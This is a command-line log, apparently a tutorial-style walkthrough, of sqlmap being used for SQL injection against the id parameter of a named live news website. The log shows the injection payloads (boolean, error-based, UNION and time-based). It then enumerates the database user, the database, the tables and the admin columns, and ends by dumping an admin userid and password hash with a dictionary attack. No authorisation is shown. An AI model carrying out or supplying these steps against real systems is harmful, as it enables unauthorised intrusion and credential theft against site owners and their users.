D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>